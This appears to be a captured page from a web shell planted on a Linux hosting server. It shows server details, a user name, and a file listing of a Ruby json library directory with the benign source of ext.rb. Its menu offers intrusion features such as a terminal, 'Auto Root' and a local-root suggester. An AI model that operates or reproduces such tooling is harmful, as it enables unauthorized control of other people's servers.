Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
lib64 /
ruby /
1.9.1 /
json /
Delete
Unzip
Name
Size
Permission
Date
Action
add
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
common.rb
14.41
KB
-rw-r--r--
2013-02-13 10:48
ext.rb
391
B
-rw-r--r--
2011-08-30 06:55
version.rb
271
B
-rw-r--r--
2013-02-13 10:48
Save
Rename
require 'json/common' module JSON # This module holds all the modules/classes that implement JSON's # functionality as C extensions. module Ext require 'json/ext/parser' require 'json/ext/generator' $DEBUG and warn "Using Ext extension for JSON." JSON.parser = Parser JSON.generator = Generator end JSON_LOADED = true unless defined?(::JSON::JSON_LOADED) end